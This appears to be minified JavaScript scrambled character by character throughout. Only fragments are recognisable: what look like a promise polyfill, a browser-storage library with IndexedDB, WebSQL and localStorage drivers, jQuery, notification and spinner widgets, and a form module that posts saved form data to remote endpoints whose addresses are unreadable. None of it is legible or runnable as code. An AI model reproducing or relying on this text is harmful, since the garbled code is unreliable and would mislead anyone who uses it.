yero(Yums asarsle ucina h is ruett h rms osrco\";f!ti ntnefc)ho e yero(Fie ocntut'rms' laeuete'e'oeao,ti betcntutrcno ecle safnto.)ti.sbcies[,(,hs}ucinlet{ucinne{(,)fnto ()vte}r{(,)cthe{()}ucinuetno{a ,,,,=()i()r{=()a!}ac()s!,=}leroa!;(,)|c&?(,)svti:==?(,)e=D&(,)}ucinfetno{a =.sbciesirlnt;[]triC=,[+]ofnto (,)frvrnore_usrbr,=.dti,=;<.egha=)=[]orat,(,,,)e_usrbr=ulfnto (,)vrnonl;r{fe=ttrwnwTpErr\" rmssclbc antrtr htsm rms.)i(()&otte,())eunocl(,ucino{eun!|(=0vi(!=?(,)heo)}fnto()rtr!n|n!,odvet))!}ac()rtr!n|vet,0}eun1fnto (,)e=thet:(,)|(,)fnto (,)e_tt==&(.saeAe_ealtyaycge)fnto (,)e_tt==&(.saeAe_ealtyaycbe)fnto ()dee_tt=)fnto ()dee_tt=)vryecni,=ecniuetojcOFnto)StiFnto,=tnwnal,=.aeIrrslekirjc,=.spyaycEvrOvi ,=,=,=;.rttp=cntutrc_tt:od0_ealvi ,sbciesvi ,hnfnto(,)vrnti,=e hscntutrfnto({)i(hs_tt)vrragmnsyaycfnto({(.saeorn_tt-]n_eal}}lefti,,,)rtr }cthfnto()rtr hste(ule},.l=,.aexcrsleIcrjc=,.rms=},(poierc\"[.uis,eprs]fnto(,)fnto ()vrtti;f!()trwnwTpErr\"o utps naryt ae\";eunnwtfnto(,)frvror0relnt;+)=[]o&fnto\"=yefote?.hntn:())vroeiArytrc=},(poierjc\"[eprs]fnto()fnto ()rtr e hsfnto(,)ne}}.eett)e\"rms/eov\"[eprs]fnto()fnto ()rtr &\"bet=tpo &ecntutr=ti?:e hsfnto()te}}.eov=},(poieuis,\"xot\",ucine{ucinte{eunne|\"bet=tpo &nl!=}ucinne{eunfnto\"=yefefnto ()rtr\"ojc ra]==betpooyetSrn.ale}a =aenw|ucin)rtr(e ae.eTm(}eojcOFnto=,.sucinneiAryoenwr)t\"rms/oyil)plfl(})fnto({ucinee{a =hsn{bnl}i()o(a neno=[]rtr e (ucineo{a =.pnnnm,.eso)roerrfnto({(.ro),.nprdnee=ucin)rrsl.raebettr(.trNm),.nucs=ucin)nd=.eutt_bnone)}}ucintet{a =hs\"tig!tpo &(idwcnoewr(+ sda e,bti sntasrn.)eSrn();a =e (ucinto{.ed(.hnfnto({a =.dIf,=.btascinrsoeae\"edny)ojcSoersoeae,=.e()aoscesfnto({a =.eutvi ==&(=ul,(),.nro=ucin)oaerr})ctho};eunuot,}ucinnet{a =hsonwdfnto(,)nray)te(ucin)vrrn_bnoird.rnato(.trNm,raol\".bettr(.trNm)aioeCro(;.nucs=ucin)vrnarsl;fn{a =(.au,.e)vi !=?()ncniu(}let),.nro=ucin)oaerr})ctho};eunuot,}ucinoetn{a =hs\"tig!tpo &(idwcnoewr(+ sda e,bti sntasrn.)eSrn();a =e (ucinnr{.ed(.hnfnto({a =.dIf,=.btascinisoeae\"edrt\".bettr(.trNm)nl==&(=od0;a =.u(,)soscesfnto({od0=t&tnl)nt}soerrfnto({(.ro)}.ac())rtr (,)rfnto (,)vrnti;srn\"=yefe&wno.osl.ane\"ue saky u ti o tig\",=tige)vronwdfnto(,)nray)te(ucin)vrrn_bnoird.rnato(.trNm,rawie)ojcSoersoeae,=.eeee;.nucs=ucin)t),.nro=ucin)oaerr}aoaotfnto()vrtetre.ro;Qoaxeddro\"=t&()}.ac())rtr (,)ofnto ()vrtti,=e (ucinen{.ed(.hnfnto({a =.dIf,=.btascinosoeae\"edrt\".bettr(.trNm)ircer)ioscesfnto({(}ioerrfnto({(.ro)}.ac())rtr (,)nfnto ()vrtti,=e (ucinen{.ed(.hnfnto({a =.dIf,=.btascinosoeae\"edny)ojcSoeosoeae,=.on(;.nucs=ucin)eirsl),.nro=ucin)nierr})cthn};eunlne,}ucinset{a =hsonwdfnto(,)rtr >?odtnl)vi .ed(.hnfnto({a =.dIf,=.btascinrsoeae\"edny)ojcSoersoeae,=1sioeCro(;.nucs=ucin)vrnsrsl;eunnvi(==?(.e)atnky:a!,.dac())vi (ul}soerrfnto({(.ro)}.ac())rtr (,)ofnto ()vrtti,=e (ucinen{.ed(.hnfnto({a =.dIf,=.btascinosoeae\"edny)ojcSoeosoeae,=.pnusr)a[;.nucs=ucin)vrtirsl;eunt(.uhtky,odtcniu()vi (),.nro=ucin)nierr})cthn};eunlne,}ucinlet{&ete(ucine{(ule}fnto()te}}ucinuet{&ete(ucine{(,),ucine{())fnto (,)rtr ?eTmotfnto({eunenl,),)vi }a =udfnd!tpo oue&oueeprsrqie\"rms\":hsPoiemm|hsidxdB|hswbiIdxdB|hsmzneeD|ti.IdxdB|hsmIdxdBi()vrp{die:ayctrg\"_nttrg:,trt:,eIe:,eIe:,eoetmrcerilnt:,e:,esc;fnto\"=yefdfn&dfn.m?eie\"snSoae,ucin)rtr }:udfnd!tpo oue&oueeprsmdl.xot=:hsayctrg=}.alwno)fnto({ucinee{a =hsn{;fefrvroi )[]eo;eunnkyrfxnnm+/,.dIf=,.eov(}ucinte{a =hsnnwmfnto(,)tray)te(ucin)frvrnt_bnokyrfxoplnt-;>0o-{a =.e()0=ridxfn&prmvIe()e))cthn};eundne,}ucinnet{a =hs\"tig!tpo &(idwcnoewr(+ sda e,bti sntasrn.)eSrn();a =e (ucinto{.ed(.hnfnto({r{a =.dIf,=.eIe(.ePei+)i&ici)ti}ac()oe})ctho};eundot,}ucinoet{a =hsonwmfnto(,)nray)te(ucin)tyfrvrrn_bnokyrfxirlnt,=.eghs0ass+{a =.e()upgttml;fu&ucu)vi !=ueulsbtigi))eunvi ()t)cthe{()}.ac())rtr (,)ofnto (,)vrnti,=e (ucinto{.ed(.hnfnto({a ,=.dIf;r{=.e()cthe{=ulo&oosbtigrkyrfxlnt),())ctho};eundot,}ucinie{a =hsnnwmfnto(,)tray)te(ucin)frvrnt_bnooplnt,=]i0oii+0=pkyi.neO(.ePei)&.uhpkyi.usrn(.ePei.egh)er}.ac())rtr (,)nfnto ()vrtti,=e (ucinen{.es)te(ucint{(.egh}.ac())rtr (,)nfnto (,)vrnti;srn\"=yefe&wno.osl.ane\"ue saky u ti o tig\",=tige)vronwmfnto(,)nray)te(ucin)vron_bnoprmvIe(.ePei+)t))ctho};eundot,}ucince{fesbtig0v!=)eunJO.as()frvrtesbtigA,=.usrn(,)onwAryufr2tlnt)rnwUn1Aryo,=.egh1i=;-)[]tcaCdA()sic()cs :eunocs :eunnwBo(o)cs :eunnwItAryo;aewrtr e itAryo;aeSrtr e itCapdra()cs :eunnwIt6ra()cs :eunnwUn1Aryo;aexrtr e n3Aryo;aekrtr e it2ra()cs :eunnwFot2ra()cs :eunnwFot4ra()dfuttrwnwErr\"nontp:\"n}fnto ()vrt\",=e it6ra()tytSrn.rmhroeapynl,)cthe{o(a =;<.egho+t=tigfoCaCd([]}euntfnto (,)vrn\";fe&netSrn()e&\"ojc raBfe]==.otig)|.ufr&[betAryufr\"=ebfe.otig))vrorheisaco raBfe?oer=)(=.ufr\"ojc n8ra]==?+y\"ojc itAry\"=nr=:[betUn8lmeAry\"=nr=:[betIt6ra]==?+_\"ojc it6ra]==?+I\"ojc n3Ary\"=nr=:[betUn3Ary\"=nr=:[betFot2ra]==?+E\"ojc la6Ary\"=nr=:(e ro(Fie ogttp o iayra\"),(+()}lei([betBo]==)vrinwFlRae;.nodfnto({a =(hsrsl)thbe}iraAAryufre}letytJO.tigf()}ac()wno.osl.ro(Cud' ovr au noaJO tig ,)tn}fnto (,,)vroti;srn\"=yefe&wno.osl.ane\"ue saky u ti o tig\",=tige)vrrnwmfnto(,)oray)te(ucin)vi ==&(=ul;a =;(,ucinta{fara;letyvrso_bnopsttmskyrfxet}ac()(Qoaxeddro\"=enm|\"SERRDMQOARAHD==.ae&re}()}}.ac())rtr (,)rfnto (,)t&.hnfnto()tnl,),ucine{())vrm\"neie\"=yefmdl&mdl.xot?eur(poie)ti.rms,=ultyi((hslcltrg&\"eIe\"nti.oaSoae)eunpti.oaSoaecthe{eunvrh\"_fc_\"vhlnt,=ab\"b\"lb,=s0\"w\"i8,=uc\"_\"i6,=s3\"I\"r6,=u3\"E\"l2,=f6\"Avglnt,=_rvr\"oaSoaerpe\"_nttrg:,trt:,eIe:,eIe:,eoetmscertlnt:,e:,esi;fnto\"=yefdfn&dfn.m?eie\"oaSoaerpe\"fnto({eunC)\"neie\"=yefmdl&mdl.xot?oueeprsCti.oaSoaerpe=}cl(idw,ucin)fnto ()vrtti,=d:ul;fefrvroi )[]\"tig!tpo []eo.otig)eo;eunnwpfnto(,)tynd=(.aeSrn(.eso)ndsrpinnsz)cthn{euntstrvr\"oaSoaerpe\".hnfnto({eunt_nttrg())te()cthr}.btascinfnto()eeeueq(CET AL FNTEIT +.trNm+ i NEE RMR E,kyuiu,vle\"[,ucin)t_bnono),ucinet{())))fnto (,)vrnti;srn\"=yefe&wno.osl.ane\"ue saky u ti o tig\",=tige)vronwpfnto(,)nray)te(ucin)vrrn_bnord.rnato(ucinn{.xctSl\"EET*FO +.trNm+ HR e II \"[]fnto(,)vronrw.eghnrw.tm0.au:ulo&ouo)to}fnto(,)ot}}}.ac())rtr (,)ofnto (,)vrnti,=e (ucinto{.ed(.hnfnto({a =.dIf;.btascinfnto()neeueq(SLC RM\"rsoeae[,ucinno{o(a =.osirlnt,=;>;+)vrsrie()csvlei(&(=(),od0=(=(,.e))eunvi ()t),ucinet{())))ctho};eundot,}ucinoetn{a =hs\"tig!tpo &(idwcnoewr(+ sda e,bti sntasrn.)eSrn();a =e (ucinnr{.ed(.hnfnto({od0=t&tnl)vritftfnto(,)i()()es{a =.dIf;.btascinfnto()oeeueq(ISR RRPAEIT +.trNm+ ky au)VLE ? ),et,ucin)ni}fnto(,)rt}}fnto()ecd==.UT_R&re}}))cthr};eundrn,}ucinret{a =hs\"tig!tpo &(idwcnoewr(+ sda e,bti sntasrn.)eSrn();a =e (ucinto{.ed(.hnfnto({a =.dIf;.btascinfnto()neeueq(DLT RM\"rsoeae\"WEEky=?,e,ucin)t),ucinet{())))ctho};eundot,}ucinie{a =hsnnwpfnto(,)tray)te(ucin)vrot_bnood.rnato(ucint{.xctSl\"EEEFO +.trNm,]fnto({(}fnto(,)nt}}}.ac())rtr (,)nfnto ()vrtti,=e (ucinen{.ed(.hnfnto({a =.dIf;.btascinfnto()teeueq(SLC ON(e)a RM\"osoeae[,ucintn{a =.osie()ceo}fnto(,)nt}}}.ac())rtr (,)nfnto (,)vrnti,=e (ucinto{.ed(.hnfnto({a =.dIf;.btascinfnto()neeueq(SLC e RM\"rsoeae\"WEEi II \"[+]fnto(,)vronrw.eghnrw.tm0.e:ulto}fnto(,)ot}}}.ac())rtr (,)ofnto ()vrtti,=e (ucinen{.ed(.hnfnto({a =.dIf;.btascinfnto()teeueq(SLC e RM\"osoeae[,ucintn{o(a =]r0rnrw.eghr+ops(.osie()ky;(),ucinet{())))cthn};eundne,}ucinle{a ,=e itArye,=\"frt0tnlnt;+3o=[[]>]o=[3nt)<|[+]>]o=[1&[+]<2nt2>6,+m6&[+];eunnlnt%=2oosbtig0olnt-)\"\"nlnt%=1&oosbtig0olnt-)\"=)ofnto ()i(.usrn(,)=vrtr SNpree;a ,,,,,=.usrn()sesbtiggC,=7*.eghlalnt,=;===[.egh1&(-,===[.egh2&c-;a =e raBfe()dnwUn8ra()frt0ltt=)=.neO([],=.neO([+],=.neO([+],=.neO([+],[+]n<|>4du+=1&)<|>2du+=3r<66&;wths{aebrtr ;aeyrtr e lb[];aewrtr e n8ra()cs :eunnwUn8ra()cs :eunnwUn8lmeAryf;aexrtr e n1Aryf;aekrtr e it6ra()cs :eunnwIt2ra()cs :eunnwUn3Aryf;aeOrtr e la3Aryf;aeArtr e la6Aryf;eal:ho e ro(Ukw ye +)}ucinfet{a =\"i(&(=.otig),&([betAryufr\"=etSrn(|ebfe&\"ojc raBfe]==.ufrtSrn(){a ,=; ntnefAryufr(=,+b:oebfe,[betItAry\"=nr=:[betUn8ra]==?+S\"ojc itCapdra]==?+_\"ojc n1Ary\"=nr=:[betUn1Ary\"=nr=:[betIt2ra]==?+I\"ojc it2ra]==?+E\"ojc la3Ary\"=nr=:[betFot4ra]==?+AtnwErr\"aldt e yefrBnrAry))trlo)es f\"ojc lb\"=n{a =e ieedriola=ucin)vrelti.eut;(++),.edsraBfe()es r{(SNsrniye)cthn{idwcnoeerr\"olntcnetvleit SNsrn:\"e,(uln}fnto (,)t&.hnfnto()tnl,),ucine{())vrm\"BDFHJLNPRTVXZbdfhjlnprtvxz13579/,=udfnd!tpo oue&oueeprsrqie\"rms\":hsPoiehti.pnaaaev\"_fc_\"gvlnt,=ab\"y\"lb,=s0\"S\"i8,=uc\"x\"i6,=s3\"k\"r6,=u3\"O\"l2,=f6\"Cgblnt;fh{a =_rvr\"eSLtrg\"_nttrg:,trt:,eIe:,eIe:,eoetmrcerilnt:,e:,esc;fnto\"=yefdfn&dfn.m?eie\"eSLtrg\"fnto({eunD)\"neie\"=yefmdl&mdl.xot?oueeprsDti.eSLtrg=}.alwno)fnto({ucineet{[]fnto({a =ruet;euneray)te(ucin)rtr []apyen}}fnto ({o(a =;<ruet.eghe+{a =ruet[]i()o(a ntthswPoet()&agmns0[]mtn)tn.lc(:[]}eunagmns0}ucinne{o(a nai(.aOnrpryt&at==)eun0rtr!}ucinon{hs_ofgt{,,)ti.dieStnl,hs_ed=1ti.dIf=ulfrvro0oclnt;+)(hsco)ti.eDie(hs_ofgdie)vrr\"neie\"=yefmdl&mdl.xot?eur(poie)ti.rms,=}a{NEED:ayctrg\"LCLTRG:lcltrgWapr,ESL\"eSLtrg\",=aIDXDBaWBQ,.OASOAE,=\"la\"\"eIe\"\"trt\"\"e\"\"es,lnt\"\"eoetm,sttm]l{EIE1EPR:,IDW3,=dsrpin\",rvrssie)nm:lcloae,ie4876soeae\"evlear\"vrin1,=.IDW\"ucin=tpo eie&eieadflDFN:udfnd!tpo oue&oueeprs&flEPR)vrdfnto()vrtt|.neeD|ewbiIdxdB|.oIdxdB|.IdxdB|.sneeD,=}rtr [.ESL=!.pnaaaenaIDXDB=!ucin)i(od0=eoeDtbs&envgtr&.aiao.srgn&/aai.etenvgtrueAet&!Crm/ts(.aiao.srgn)rtr!;r{eunt&fnto\"=yeftoe&vi !=.DKyag}ac()rtr!}(,[.OASOAE=!ucin)tyrtr .oaSoae&sttmi .oaSoae&.oaSoaesttmcthe{eun1})n(hs,=ra.sra|fnto()rtr\"ojc ra]==betpooyetSrn.ale}pti;.rttp.NEED=.NEED,.rttp.OASOAEaLCLTRG,.rttp.ESLaWBQ,.rttp.ofgfnto()i(ojc\"=yefe{fti.rayrtr e ro(Cntcl ofg)atrlcloaehsbe sd\";o(a ne\"trNm\"=t&et=[]rpae/Wg\"\")ti.cni[]et;eundie\"ne&.rvr&hsstrvrti.cni.rvr,0rtr\"tig=tpo ?hs_ofge:hs_ofg,.rttp.eiervrfnto(,,)vranwrfnto(,)tyvrae_rvrsnwErr\"utmdie o opin;sehts/mzlagtu.olcloae#eiervr)lnwErr\"utmdie aearayi s:\"e_rvr;f!.die)eunvi ()i((.die)rtr odol;o(a =.oct\"iiSoae)f0fulnt;+)vrmuf;f!|![]|fnto\"=yefem)eunvi ()vrprrsle!)\"spoti &(=.spot&fnto\"=yefe_upr?.spot)rrsle!e_upr),.hnfnto()da=,[]et),)cthe{()};eunate(,)a,.rttp.rvrfnto({eunti.die|nl}opooyerayfnto()vrtti,=e (ucinen{.dieStte(ucin)nl==.ray&t_ed=.iiSoaet_ofg)t_ed.hnen}.ac())rtr .hnee,}opooyestrvrfnto(,,)fnto ({.cni.rvrsdie(}a =hsrtr\"tig=tpo &(=e)ti.dieStnwrfnto(,)vras_eFrtupreDie()cnwErr\"oaalbesoaemto on.)i(artr .dieStrrjc()vi ()i(.dIf=uls_ed=ulna)i(==.EIErtr odrqie[]fnto()s_xede,(};ff=lEPR)vrusic()cs .NEED:=eur(.diesidxdb)bekcs .OASOAEurqie\"/rvr/oasoae)bekcs .ESLurqie\"/rvr/esl)s_xedu}les_xedpa)es{f![]rtr .dieStrrjc()vi ()s_xedia)t))ti.dieStte(,)ti.dieStte(,)ti.dieSt,.rttp.uprsfnto()rtr!de}opooye_xedfnto()tti,),.rttp.gtisSpotdrvrfnto()i(&me)o(a =;<.eght+{a =[]i(hsspot()rtr }eunnl}opooyecetIsac=ucine{eunnwoe}vrhnwof=lDFN?eie\"oafrg\"fnto({eunh)f=lEPR?oueeprshti.oafrg=}cl(idw,.nsraiebetfnto()vrt{,=hssraiera(;eun$ec(,ucin)i(1=hsnm.neO(x_){a =e&hsvlescuisrpaepcaCaAdnoeti.au)ti.au)|\"tti.ae?tti.ae.uh|tti.ae=tti.ae],[hsnm]ps():[hsnm]n},}vrscsc|}scuisfnto({euncekfSEfnto({a =idwnvgtrueAetteidxf\"SE\",=.neO(.E L\";eun(1=t&1=n}cekfieR:ucin)rtr!-==ouetlcto.rtclidxf\"ie\"),hcIBosruprSoaeytmfnto({eun(hscekfSE)&hscekfieR(),iefnto()rtr SNsrniye.egh,elcSeilhrnEcd:ucine{eunecdUIopnn(.elc([\\/,\\\\\".elc([\"/,\\\")rpae/\\]g\"\\\".elc([b/,\\b)rpae/\\]g\"\\\".elc([n/,\\n)rpae/\\]g\"\\\".elc([t/,\\t)}gtsnaeeafnto({a =}rtr (ipti^x_\".ahfnto({[(hs.tr\"ae)=s.tl.elcSeilhrnEcd((hs.a())e}(;a s=s|{;s.omumtouefnto({a =uleh_evr\"tp:/hr.pedhecnetrcmeh/,r_umtsre:hts/saesrasetovre.o/umt\"ulsbi_utfr_evr\",eoeolnfrsbi_alakvi ,fe_nieomumtclbc:od0atrofieomumtclbc:od0gtsnomaaclbc:od0,=ucinet{.jx{ah:1cosoan!,ye\"E\"dtTp:tx\"tmot83ulscfrSbiMdl.pin.r_cosre,ucs:ucint{(),ro:ucineno{()}}nfnto(,,)$aa(tp:PS\"cosoan!,otnTp:apiainjo;castuf8,r:s.omumtoueotosulsbi_evrdt:SNsrniye,ucs:ucine{(),ro:ucineto{(});eunclIOlnEs:,umthsomfnto()vrt$etn(0scfrSbiMdl.eJoFrDt(,s.tl.eJoPgMt()rtr s.tl.iet>e?(:(,ucine{s.omumtoueotosatrolnfrsbi_alak\"ucs\"e}fnto()scfrSbiMdl.pin.fe_nieomumtclbc(err,Tesbi a ald laetysbitn h omatrawie\"},1,umtneutFr:ucin)fnto ()i(.eghn{a =[]lcloaegttmifnto(,)i(i{a =s.tl.ies;+la=e&n1?cps([],.uhs,+,.eghnen:()t)}}fnto ({a =}tfrsrvrl$etn(0tscuisgtsnaeea);(,ucint{ucinnl{fclnt>)vrucl;oafrg.eoetmufnto()u|oslc(,)0=olnt&scfrSbiMdl.pin.fe_flnfrsbi_alak&s.omumtoueotosatrofieomumtclbc(sces,)scGoa.omtrg.omtrgUdtClbc(-,dlt\",+,.eghlnl:aicnwAryrnwArye0)}}n0}fnto({s.omumtoueotosatrofieomumtclbc&scfrSbiMdl.pin.fe_flnfrsbi_alak\"ro\"sau))vronwAryrnwAryiscuissz(s.tl.eJoPgMt()ais0cnwArylcloaeieaefnto(,,)ops(),ucin)vrtoidxf\"hsfr_)t-&oslc(,)osr(ucinet{a =.eghotlnt;eunesbtig8n-.usrn(,))solnt,s.lblfrSoaefrSoaepaealaks\"umt)e0}}gtsnomaavi ,ofgfnto()ti.pin=hsotos$etn(}ti.pin,)$etn(}et,hsgtsnomaati.pin.eJoFrDt_alak}(;a s=s|{;s.omtrgCasfnto({ucinee{a =od0=e&.aOnrpry\"bae)edNm:wrbo\"nvi !=&ehswPoet(ofietrUdt\"?.flnSoepaevi ,=od0=e&.aOnrpry\"alakAtrflnSoe)eclbc_feOfietr:od0rtr oafrg.ofg{rvr[oafrg.NEED,oafrg.OASOAE,aetvrin1soeaet){trTiFr:ucinet{oafrg.eIe(ti_om\"et}stitFedfnto(,)lcloaegttm\"it_ils\"fnto(,)oo|]-=oidxfe&(.uhe,oafrg.eIe(dryfed_,,)}}cekfilIDryfnto(,)lcloaegttm\"it_ils\"fnto(,)oo|]vrroidxfe>1tr}}frSoaepaealaknsvFrAOfieumtntrg:ucine{a =s.tl.iescuisgtsnaeea);+scuissz()t95\"neie\"=o&(err,Tefr slre hntemxmmsz n antb ae.)ti.snGtaeFrson(ucint{a =_umt1;>0&r\"sbi_++t,ucint{oafrg.eIe(,,uciner{>&(udfnd!=&nt\"ae)\"neie\"=o&(sces)}}t}}rsoehsomaarmtrg:ucine{oafrg.eIe(ti_om\"fnto(,)i(ul=n&ojc\"=yefnfrvroi ).aOnrpryo&scfrBne.idono)e\")),snRaEcSvdomfnto()tylcloaeky(ucintn{fnlnt>)o(a =;<.egho+\"\"=no.hrt0&fnto()lcloaegttmtfnto(,)eto}}no))cthe{}ayceSvdomCutfnto()lcloaeky(ucintn{a =;fnlnt>)o(a =;<.eghr+\"\"=nr.hrt0&o+eo}}ayceSvdomKy:ucine{oafrg.esfnto(,)vronwAryi(.egh0frvrr0rnlnt;+)_==[]caA()&.uhnr)eo}}ayceoeaeFrBKyfnto(,)lcloaermvIe(,ucine{udfnd!=&lcloaeky(ucinet{(.egh1\"eee))),snRmvAlaeFrsfnto()ti.snGtaeFrsesfnto()frvrni )<.egh1lcloaermvIe([]fnto()}:lcloaermvIe([]fnto()},())}vrtrtr{eIsac:ucinn{eunt|ten)t}(,tigpooyesatWt|(tigpooyesatWt=ucinet{euntt|,hsidxfet==},ucine{(\"qey]fnto()rtr ucin)fnto (,,)rtr (tp:.ro,cnls:(.cnlse.ro,esg:,pinOerd:,il:}}ucinntn{eunt|th),=(#+.otieI)glnt?:n&gft)g}ucinoetn{eunp{yeSif,cnls:(.cnlse.nomsaeeotosvrienttet)fnto ()befnto (,,)rtr (tp:.ucs,cnls:(.cnlse.ucs,esg:,pinOerd:,il:}}ucinaetn{eunp{yeSwrigioCash)ioCasswrigmsaeeotosvrienttet)fnto ()vrth)g|()uet|lt}ucinct{a =(;eung|()t&==(:ou\"t.eghvi ()vi(.hlrn)lnt&grmv()fnto ()frvrngcide(,=.egh1o=;-)(([],)fnto (,)rtr!!|0=e\"fcs,)lnt)&tnhdMto]{uainnhdDrto,aignhdEsn,opeefnto({()},0}ucinft{eunge\"dv>)at(i\"tcnanrd.dCastpstoCas.tr\"ralv\"\"oie)at(rl\"\"lr\",.pedoettre),}ucind)rtr{aTDsis!,osCas\"os\"cnanrd\"os-otie\"dbg!,hwehd\"aen,hwuain30soEsn:sig,nhw:od0hdMto:fdOt,ieuain13hdEsn:sig,nidnvi ,xeddieu:e,cnlse:err\"os-ro\"if:tatif\"sces\"os-ucs\"wrig\"os-ann\",cnls:tatif\"pstoCas\"os-o-ih\"tmOt53ttels:tattte,esgCas\"os-esg\"tre:bd\"coetl'bto ye\"utn>tms<bto>,eetno:0peetulcts!,rgesa:1}ucinme{&be}ucinpt{ucinot{eune\"fcs,)lnt|t(laTmotSitraI)ushdMto]{uainshdDrto,aigshdEsn,opeefnto({()soHde&\"idn!=.tt&soHde(,.tt=hde\"_edienwDt,()})vi }ucinr)(.ieu>|setneTmOt0&(=eTmotosetneTmOt,.aHdTm=asFotsetneTmOt,.iet=nwDt)gtie)Smxieie}ucini)cerieu()ShdEa0uso(0!)ssoMto]{uainssoDrto,aigssoEsn}}ucina)vre(.iet-nwDt)gtie)/.aHdTm*0;.it(+%)vrsh)ctioCas|.cnls;fvi !=.pinOerd&(=.xedstotosvrie,\n=.pinOerd.cnls|c,.rvnDpiae)i(.esg==)eunytmsaew+gns!)vrlnl,=(<i/\",=(<i/\",=(<i/\",=(<i/\",=(.lsHm)S{nevldnl,iet:ulmxieienl}_{osI:,tt:vsbe,trTm:e aeotossmpt;euntioCas&.dCasstatls)adls()ttte&fapn(.il)adls(.ilCas,.pedf)tmsae&dapn(.esg)adls(.esgCas,.pedd)scoeutn&badls(tatcoebto\".tr\"oe,bto\",.rpn(),.rgesa&(.dCas\"os-rges)upeedp)uhd(,.eetno?.rpn()gapn()ussoMto]{uainssoDrto,aigssoEsn,opeesoSon)stmOt0&lstieu(,.ieu)Smxieieprela(.ieu)ShdEa(e ae.eTm(+.aHdTm,.rgesa&(.nevldstnevla1))uhvrir,socik&.aTDsis&.lc()scoeutn&&bcikfnto()esoPoaainesoPoaain)vi !=.aclube&0=ecneBbl&(.aclube!)o!))socik&.lc(ucin)socik)o))m_,.eu&cnoeufnto ({euneetn(}d)_otos}ucinve{|(=()ei(:iil\"|(.eoe)enl,==.hlrn)lnt&(.eoe)yvi )}a ,,,=,=err\"ro\"if:if\"sces\"ucs\"wrig\"ann\",=cersrmv:,ro:,eCnanrnif:,pin:}sbcierscesivrin\"..\"wriga;eun_(}}\"ucin=tpo eie&eieaddfn:ucinet{udfnd!tpo oue&oueeprsmdl.xot=(eur(jur\")wno.osrtwno.Qey},ucine{fnto\"=yefdfn&dfn.m?eie[jur\",)\"bet=tpo xot?oueeprserqie\"qey):(Qey}fnto()i(espotcr&eaaTasot&idwXoaneus)vrt/hts://in/gtps$ionwRgx(^+oainpooo,i)eaaTasot\" ethm m sn,ucinria{frcosoan&.sn&nts(.ye&tts(.r)&.etrul)vrsnl;eunsn:ucintn{a =\"a(.aaye|\".ooeCs(;=e DmiRqet/\\+/ts(.ieu)&stmotitmot,.nieu=ucin)n50\"ieu\"}sola=ucin)vrt\"otn-egh +.epneetlnt+\\\\CnetTp:\"scnetyeo{oe20msae\"ucs\",=tx:.epneet;r{f\"tl==|/et/tlits(.otnTp)rhm=.epneetes f\"sn==|\"et!=&//snits(.otnTp)tyrjo=.asJO(.epneet}ac()ocd=0,.esg=prero\"es f\"m\"=a|tx\"=a&\\xlits(.otnTp){a =e cieOjc(McootXLO\";.sn=1tyilaXLsrsosTx)cthe{=od0i(i|idcmnEeet|.eEeetBTgae\"asrro\".eghtrwocd=0,.esg=prero\"\"nai M:\"srsosTx;.m=}cthe{ho }ial{(.oeomsaert},.nrgesfnto({,.nro=ucin)n50\"ro\"{etsrsosTx}}idt&(=srn\"=etp(.aa?.aaeprmidt),.pnrtp,.r)ssn(),br:ucin)s&.br(}})},ucinet{ojc\"=yefeprsmdl.xot=(:fnto\"=yefdfn&dfn.m?eiet:.pne=(}ti,ucin)fnto (,)vrnodcmn.raelmn(|\"i\";o( nton=[]rtr }ucinte{o(a =,=ruet.eghntt+eapnCidagmnst)rtr }ucinnetno{a =\"pct\"t~(0*)no.on\"\",=0+/*0,=ahmx1(-)t(0-)e,=.usrn(,.neO(Aiain).ooeCs(,=&\"\"s\"\"|\"rtr []|lisrRl(@++kyrms\"r\"0{pct:++}++%oaiy\"e\"\"(+0)\"{pct:}+it%0+%oaiy\"e\"10{pct:++}\"lcsue.egh,[]1,}ucinoet{a ,,=.tl;fttcaA()tUprae)tsie1,od0=rt)euntfro0oulnt;+)fnuo+,od0=rn)eunnfnto (,)frvrni ).tl[(,)|]tn;eunefnto ()frvrt1tagmnslnt;+)vrnagmnst;o(a nnvi ==[]&eo=[]}eunefnto (,)rtr\"tig=tpo ?:[%.egh}ucinse{hsot=(|{,.ealsd}a ,,=\"ekt,Mz,m\"\"\",=}d{ie:2lnt:,it:,ais1,cl:,onr:,oo:#0\"oaiy.5rtt:,ieto:,pe:,ri:0,p:0zne:e,lsNm:sinr,o:5%,et\"0\"sao:1hacl!,oiin\"boue}i(.eals{,(.rttp,si:ucint{hsso(;a =hsonot,=.lenl,casaeocasae)i((,psto:.oiinwdh0zne:.Idxlf:.ettpotp)t&.neteoeitfrthl|nl)isttrbt(rl\"\"rgesa\",.ie(,.ps,c{a ,=,=olns1*1odrcin/,=.p,=/.pe,=1ooaiy/fotal10,=/.ie;fnto ({+;o(a =;<.ie;+)=ahmx1(+olnst*)fdooaiy,.pct(,*.ieto+,,)ntmotne&stieu(,~13u)(}eunn,tpfnto({a =hse;eune&cerieu(hstmot,.aetoe&.aetoermvCide,hse=od0,hs,ie:ucinoi{ucinstn{eunre){oiin\"boue,it:.cl*ilnt+.it)\"x,egtisaeiwdh\"x,akrudtbxhdwntasomrgn\"et,rnfr:rtt(+~30ilnsuirtt)\"e)tasae\"isaeirdu+p,),odrais(.onr*.cl*.it>1+p\")frvrlu0f(.ie-)(-.ieto)2uilnsu+lre){oiin\"boue,o:+(.cl*.it/)\"x,rnfr:.wce?tasaed000\"\",pct:.pct,nmto:&nioaiyitalfuidrcinilns+ +/.pe+slna niie},.hdw&(,((#0\"\" p 00){o:2x})totlsaiclru,001xrb(,,,1\");euno,pct:ucinetn{<.hlNdslnt&(.hlNdst.tl.pct=)},udfnd!tpo ouet{=ucin)vrne\"tl\"{ye\"etcs};euntdcmn.eEeetBTgae\"ed)0,)nset|.tlSet(;a =((gop){eair\"r(dfutVL\")!(,tasom)&.d?ucin)fnto (,)rtr (<++ mn=unshmsmcootcmvl ls=si-m\"'n}.dRl(.pnvl,bhvo:r(dfutVL\",.rttp.ie=ucineo{ucini)rtr ((gop,codieu\"\"ucodrgn-+ +l){it:,egtu)fnto (,,)tdtri){oain30olnse\"e\"lf:~},(((rudet,acieocres){it:,egtosaeowdhlf:.cl*.aistp-.cl*.it>1fle:},(fl\"{oo:(.oo,)oaiyooaiy)n\"toe,oaiy0))}a ,=.cl*olnt+.it)u2osaelf-owdholnt)osae2\"x,=((,psto:aslt\"tpflf:};fosao)o(=;<olnsc+sc-,poi:XmgTasomMcootBu(ierdu=,aehdw1saooaiy.))frc1c=.ie;+)()rtr (,),.rttp.pct=ucinetno{a 